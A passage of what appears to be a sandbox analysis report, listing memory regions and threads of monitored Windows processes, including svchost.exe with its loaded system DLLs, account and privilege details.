0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2568 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2569 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2570 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2571 start_va = 0x7ffaf4230000 end_va = 0x7ffaf4249fff entry_point = 0x7ffaf4230000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2572 start_va = 0x7ffaf4250000 end_va = 0x7ffaf4257fff entry_point = 0x7ffaf4250000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2573 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2574 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2575 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2576 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2577 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2578 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2579 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2580 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2581 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2582 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2583 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2584 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2585 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2586 start_va = 0x7ffaf50e0000 end_va = 0x7ffaf513afff entry_point = 0x7ffaf50e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2587 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2588 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2589 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2590 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2591 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2592 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2593 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2594 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2595 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2596 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2597 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2598 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2599 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2600 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2601 start_va = 0x7ffaf7690000 end_va = 0x7ffaf7854fff entry_point = 0x7ffaf7690000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2602 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2603 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6360 start_va = 0xcb80100000 end_va = 0xcb801fffff entry_point = 0x0 region_type = private name = "private_0x000000cb80100000" filename = "" Region: id = 6361 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 6362 start_va = 0x7ff7875d6000 end_va = 0x7ff7875d7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7875d6000" filename = "" Region: id = 6366 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 6367 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 6520 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 7015 start_va = 0xcb81600000 end_va = 0xcb816fffff entry_point = 0x0 region_type = private name = "private_0x000000cb81600000" filename = "" Region: id = 7016 start_va = 0x7ff78749c000 end_va = 0x7ff78749dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78749c000" filename = "" Region: id = 7017 start_va = 0xcb81a00000 end_va = 0xcb81afffff entry_point = 0x0 region_type = private name = "private_0x000000cb81a00000" filename = "" Region: id = 7018 start_va = 0x7ff787498000 end_va = 0x7ff787499fff entry_point = 0x0 region_type = private name = "private_0x00007ff787498000" filename = "" Region: id = 7082 start_va = 0xcb81b50000 end_va = 0xcb81c4ffff entry_point = 0x0 region_type = private name = "private_0x000000cb81b50000" filename = "" Region: id = 7083 start_va = 0xcb81f00000 end_va = 0xcb81ffffff entry_point = 0x0 region_type = private name = "private_0x000000cb81f00000" filename = "" Region: id = 7084 start_va = 0x7ff787488000 end_va = 0x7ff787489fff entry_point = 0x0 region_type = private name = "private_0x00007ff787488000" filename = "" Region: id = 7085 start_va = 0x7ff78748a000 end_va = 0x7ff78748bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78748a000" filename = "" Region: id = 7086 start_va = 0xcb83700000 end_va = 0xcb837fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83700000" filename = "" Region: id = 7087 start_va = 0xcb83800000 end_va = 0xcb838fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83800000" filename = "" Region: id = 7088 start_va = 0x7ff787482000 end_va = 0x7ff787483fff entry_point = 0x0 region_type = private name = "private_0x00007ff787482000" filename = "" Region: id = 7089 start_va = 0x7ff787484000 end_va = 0x7ff787485fff entry_point = 0x0 region_type = private name = "private_0x00007ff787484000" filename = "" Region: id = 7090 start_va = 0xcb83900000 end_va = 0xcb839fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83900000" filename = "" Region: id = 7091 start_va = 0x7ff78747e000 end_va = 0x7ff78747ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78747e000" filename = "" Region: id = 7195 start_va = 0xcb83a00000 end_va = 0xcb83afffff entry_point = 0x0 region_type = private name = "private_0x000000cb83a00000" filename = "" Region: id = 7196 start_va = 0x7ff78747a000 end_va = 0x7ff78747bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78747a000" filename = "" Region: id = 7264 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 7782 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 8025 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 8418 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 8536 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 8929 start_va = 0xcb83700000 end_va = 0xcb838fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83700000" filename = "" Region: id = 8930 start_va = 0xcb83700000 end_va = 0xcb837fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83700000" filename = "" Region: id = 9071 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 9280 start_va = 0xcb80bd0000 end_va = 0xcb80bd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Region: id = 9326 start_va = 0xcb81a00000 end_va = 0xcb81afffff entry_point = 0x0 region_type = private name = "private_0x000000cb81a00000" filename = "" Region: id = 9327 start_va = 0x7ff787498000 end_va = 0x7ff787499fff entry_point = 0x0 region_type = private name = "private_0x00007ff787498000" filename = "" Region: id = 9386 start_va = 0xcb81f00000 end_va = 0xcb81ffffff entry_point = 0x0 region_type = private name = "private_0x000000cb81f00000" filename = "" Region: id = 9387 start_va = 0x7ff787488000 end_va = 0x7ff787489fff entry_point = 0x0 region_type = private name = "private_0x00007ff787488000" filename = "" Region: id = 9695 start_va = 0xcb80be0000 end_va = 0xcb80be0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80be0000" filename = "" Region: id = 9806 start_va = 0xcb80be0000 end_va = 0xcb80be0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80be0000" filename = "" Region: id = 10447 start_va = 0xcb83800000 end_va = 0xcb839fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83800000" filename = "" Region: id = 10448 start_va = 0xcb83800000 end_va = 0xcb838fffff entry_point = 0x0 region_type = private name = "private_0x000000cb83800000" filename = "" Region: id = 10501 start_va = 0x7ffaf0230000 end_va = 0x7ffaf0238fff entry_point = 0x7ffaf0230000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 10567 start_va = 0xcb8c100000 end_va = 0xcb8c2fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c100000" filename = "" Region: id = 10568 start_va = 0xcb8c100000 end_va = 0xcb8c1fffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c100000" filename = "" Region: id = 10571 start_va = 0xcb80bd0000 end_va = 0xcb80bd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb80bd0000" filename = "" Thread: id = 396 os_tid = 0x8f0 Thread: id = 397 os_tid = 0xed8 Thread: id = 398 os_tid = 0xe74 Thread: id = 399 os_tid = 0x884 Thread: id = 400 os_tid = 0xbe4 Thread: id = 401 os_tid = 0x9e4 Thread: id = 402 os_tid = 0xa74 Thread: id = 403 os_tid = 0x528 Thread: id = 404 os_tid = 0x7ac Thread: id = 405 os_tid = 0x848 Thread: id = 406 os_tid = 0x738 Thread: id = 407 os_tid = 0x260 Thread: id = 408 os_tid = 0x8a0 Thread: id = 409 os_tid = 0x89c Thread: id = 410 os_tid = 0x7f8 Thread: id = 411 os_tid = 0x7b8 Thread: id = 412 os_tid = 0x7b4 Thread: id = 413 os_tid = 0x79c Thread: id = 414 os_tid = 0x774 Thread: id = 415 os_tid = 0x74c Thread: id = 416 os_tid = 0x740 Thread: id = 417 os_tid = 0x728 Thread: id = 418 os_tid = 0x6a0 Thread: id = 419 os_tid = 0x64c Thread: id = 420 os_tid = 0x638 Thread: id = 421 os_tid = 0x628 Thread: id = 422 os_tid = 0x620 Thread: id = 423 os_tid = 0x600 Thread: id = 424 os_tid = 0x5ec Thread: id = 425 os_tid = 0x5d0 Thread: id = 426 os_tid = 0x5b4 Thread: id = 427 os_tid = 0x5a4 Thread: id = 428 os_tid = 0x55c Thread: id = 429 os_tid = 0x4f0 Thread: id = 430 os_tid = 0x4ec Thread: id = 431 os_tid = 0x130 Thread: id = 432 os_tid = 0x18c Thread: id = 433 os_tid = 0x168 Thread: id = 434 os_tid = 0x11c Thread: id = 435 os_tid = 0xfc Thread: id = 436 os_tid = 0xf8 Thread: id = 437 os_tid = 0xf4 Thread: id = 438 os_tid = 0x3fc Thread: id = 439 os_tid = 0x3e8 Thread: id = 440 os_tid = 0x3c8 Thread: id = 441 os_tid = 0x3c4 Thread: id = 442 os_tid = 0x3c0 Thread: id = 443 os_tid = 0x3bc Thread: id = 444 os_tid = 0x3a0 Thread: id = 445 os_tid = 0x31c Thread: id = 815 os_tid = 0xb0 Thread: id = 859 os_tid = 0x6d0 Thread: id = 860 os_tid = 0x5cc Thread: id = 862 os_tid = 0x844 Thread: id = 864 os_tid = 0x724 Thread: id = 865 os_tid = 0x960 Thread: id = 866 os_tid = 0x8e8 Thread: id = 867 os_tid = 0xe68 Thread: id = 873 os_tid = 0xf64 Thread: id = 967 os_tid = 0xfdc Thread: id = 968 os_tid = 0xb4c Process: id = "44" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47dd1000" os_pid = "0x340" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1df" [0xc000000f], "LOCAL" [0x7] Region: id = 4203 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4204 start_va = 0xd39bb60000 end_va = 0xd39bb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bb60000" filename = "" Region: id = 4205 start_va = 0xd39bb70000 end_va = 0xd39bb70fff entry_point = 0xd39bb70000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 4206 start_va = 0xd39bb80000 end_va = 0xd39bb93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bb80000" filename = "" Region: id = 4207 start_va = 0xd39bba0000 end_va = 0xd39bc1ffff entry_point = 0x0 region_type = private name = "private_0x000000d39bba0000" filename = "" Region: id = 4208 start_va = 0xd39bc20000 end_va = 0xd39bc23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bc20000" filename = "" Region: id = 4209 start_va = 0xd39bc30000 end_va = 0xd39bc30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bc30000" filename = "" Region: id = 4210 start_va = 0xd39bc40000 end_va = 0xd39bc41fff entry_point = 0x0 region_type = private name = "private_0x000000d39bc40000" filename = "" Region: id = 4211 start_va = 0xd39bc50000 end_va = 0xd39bd0dfff entry_point = 0xd39bc50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4212 start_va = 0xd39bd10000 end_va = 0xd39bd10fff entry_point = 0x0 region_type = private name = "private_0x000000d39bd10000" filename = "" Region: id = 4213 start_va = 0xd39bd20000 end_va = 0xd39bd26fff entry_point = 0x0 region_type = private name = "private_0x000000d39bd20000" filename = "" Region: id = 4214 start_va = 0xd39bd30000 end_va = 0xd39bd30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bd30000" filename = "" Region: id = 4215 start_va = 0xd39bdb0000 end_va = 0xd39bdb0fff entry_point = 0x0 region_type = private name = "private_0x000000d39bdb0000" filename = "" Region: id = 4216 start_va = 0xd39bdc0000 end_va = 0xd39bdc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bdc0000" filename = "" Region: id = 4217 start_va = 0xd39bdd0000 end_va = 0xd39bdd6fff entry_point = 0x0 region_type = private name = "private_0x000000d39bdd0000" filename = "" Region: id = 4218 start_va = 0xd39bde0000 end_va = 0xd39bdfffff entry_point = 0x0 region_type = private name = "private_0x000000d39bde0000" filename = "" Region: id = 4219 start_va = 0xd39be00000 end_va = 0xd39befffff entry_point = 0x0 region_type = private name = "private_0x000000d39be00000" filename = "" Region: id = 4220 start_va = 0xd39bf00000 end_va = 0xd39bfbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bf00000" filename = "" Region: id = 4221 start_va = 0xd39bfc0000 end_va = 0xd39c024fff entry_point = 0xd39bfc0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4222 start_va = 0xd39c030000 end_va = 0xd39c030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c030000" filename = "" Region: id = 4223 start_va = 0xd39c040000 end_va = 0xd39c040fff entry_point = 0x0 region_type = private name = "private_0x000000d39c040000" filename = "" Region: id = 4224 start_va = 0xd39c050000 end_va = 0xd39c050fff entry_point = 0x0 region_type = private name = "private_0x000000d39c050000" filename = "" Region: id = 4225 start_va = 0xd39c060000 end_va = 0xd39c066fff entry_point = 0x0 region_type = private name = "private_0x000000d39c060000" filename = "" Region: id = 4226 start_va = 0xd39c070000 end_va = 0xd39c0effff entry_point = 0x0 region_type = private name = "private_0x000000d39c070000" filename = "" Region: id = 4227 start_va = 0xd39c0f0000 end_va = 0xd39c0f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c0f0000" filename = "" Region: id = 4228 start_va = 0xd39c100000 end_va = 0xd39c1fffff entry_point = 0x0 region_type = private name = "private_0x000000d39c100000" filename = "" Region: id = 4229 start_va = 0xd39c200000 end_va = 0xd39c387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c200000" filename = "" Region: id = 4230 start_va = 0xd39c390000 end_va = 0xd39c510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c390000" filename = "" Region: id = 4231 start_va = 0xd39c520000 end_va = 0xd39c59ffff entry_point = 0x0 region_type = private name = "private_0x000000d39c520000" filename = "" Region: id = 4232 start_va = 0xd39c5a0000 end_va = 0xd39c61ffff entry_point = 0x0 region_type = private name = "private_0x000000d39c5a0000" filename = "" Region: id = 4233 start_va = 0xd39c620000 end_va = 0xd39c71ffff entry_point = 0x0 region_type = private name = "private_0x000000d39c620000" filename = "" Region: id = 4234 start_va = 0xd39c720000 end_va = 0xd39c79ffff entry_point = 0x0 region_type = private name = "private_0x000000d39c720000" filename = "" Region: id = 4235 start_va = 0xd39c7a0000 end_va = 0xd39c7bffff entry_point = 0x0 region_type = private name = "private_0x000000d39c7a0000" filename = "" Region: id = 4236 start_va = 0xd39c7c0000 end_va = 0xd39c7dffff entry_point = 0x0 region_type = private name = "private_0x000000d39c7c0000" filename = "" Region: id = 4237 start_va = 0xd39c7e0000 end_va = 0xd39c7e4fff entry_point = 0xd39c7e0000 region_type = mapped_file name = "pcaevts.dll" filename = "\\Windows\\System32\\pcaevts.dll" (normalized: "c:\\windows\\system32\\pcaevts.dll") Region: id = 4238 start_va = 0xd39c800000 end_va = 0xd39c8fffff entry_point = 0x0 region_type = private name = "private_0x000000d39c800000" filename = "" Region: id = 4239 start_va = 0xd39c900000 end_va = 0xd39c9fffff entry_point = 0x0 region_type = private name = "private_0x000000d39c900000" filename = "" Region: id = 4240 start_va = 0xd39ca00000 end_va = 0xd39ca7ffff entry_point = 0x0 region_type = private name = "private_0x000000d39ca00000" filename = "" Region: id = 4241 start_va = 0xd39ca80000 end_va = 0xd39cafffff entry_point = 0x0 region_type = private name = "private_0x000000d39ca80000" filename = "" Region: id = 4242 start_va = 0xd39cb00000 end_va = 0xd39cb7ffff entry_point = 0x0 region_type = private name = "private_0x000000d39cb00000" filename = "" Region: id = 4243 start_va = 0xd39cb80000 end_va = 0xd39cbfffff entry_point = 0x0 region_type = private name = "private_0x000000d39cb80000" filename = "" Region: id = 4244 start_va = 0xd39cc00000 end_va = 0xd39ccfffff entry_point = 0x0 region_type = private name = "private_0x000000d39cc00000" filename = "" Region: id = 4245 start_va = 0xd39cd00000 end_va = 0xd39cdfffff entry_point = 0x0 region_type = private name = "private_0x000000d39cd00000" filename = "" Region: id = 4246 start_va = 0xd39ce00000 end_va = 0xd39cefffff entry_point = 0x0 region_type = private name = "private_0x000000d39ce00000" filename = "" Region: id = 4247 start_va = 0xd39cf00000 end_va = 0xd39cffffff entry_point = 0x0 region_type = private name = "private_0x000000d39cf00000" filename = "" Region: id = 4248 start_va = 0xd39d000000 end_va = 0xd39d336fff entry_point = 0xd39d000000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4249 start_va = 0xd39d340000 end_va = 0xd39d3bffff entry_point = 0x0 region_type = private name = "private_0x000000d39d340000" filename = "" Region: id = 4250 start_va = 0xd39d3c0000 end_va = 0xd39d4bffff entry_point = 0x0 region_type = private name = "private_0x000000d39d3c0000" filename = "" Region: id = 4251 start_va = 0xd39d4c0000 end_va = 0xd39d5bffff entry_point = 0x0 region_type = private name = "private_0x000000d39d4c0000" filename = "" Region: id = 4252 start_va = 0xd39d600000 end_va = 0xd39d6fffff entry_point = 0x0 region_type = private name = "private_0x000000d39d600000" filename = "" Region: id = 4253 start_va = 0xd39d700000 end_va = 0xd39d792fff entry_point = 0xd39d700000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 4254 start_va = 0xd39d7a0000 end_va = 0xd39d89ffff entry_point = 0x0 region_type = private name = "private_0x000000d39d7a0000" filename = "" Region: id = 4255 start_va = 0xd39d900000 end_va = 0xd39d9fffff entry_point = 0x0 region_type = private name = "private_0x000000d39d900000" filename = "" Region: id = 4256 start_va = 0xd39db00000 end_va = 0xd39dbfffff entry_point = 0x0 region_type = private name = "private_0x000000d39db00000" filename = "" Region: id = 4257 start_va = 0xd39dc00000 end_va = 0xd39dcfffff entry_point = 0x0 region_type = private name = "private_0x000000d39dc00000" filename = "" Region: id = 4258 start_va = 0xd39dd00000 end_va = 0xd39ddfffff entry_point = 0x0 region_type = private name = "private_0x000000d39dd00000" filename = "" Region: id = 4259 start_va = 0xd39de00000 end_va = 0xd39defffff entry_point = 0x0 region_type = private name = "private_0x000000d39de00000" filename = "" Region: id = 4260 start_va = 0xd39df00000 end_va = 0xd39df7ffff entry_point = 0x0 region_type = private name = "private_0x000000d39df00000" filename = "" Region: id = 4261 start_va = 0xd39df80000 end_va = 0xd39dfeffff entry_point = 0xd39df80000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 4262 start_va = 0xd39e000000 end_va = 0xd39e0fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e000000" filename = "" Region: id = 4263 start_va = 0xd39e100000 end_va = 0xd39e1fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e100000" filename = "" Region: id = 4264 start_va = 0xd39e200000 end_va = 0xd39e2fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e200000" filename = "" Region: id = 4265 start_va = 0xd39e400000 end_va = 0xd39e4fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e400000" filename = "" Region: id = 4266 start_va = 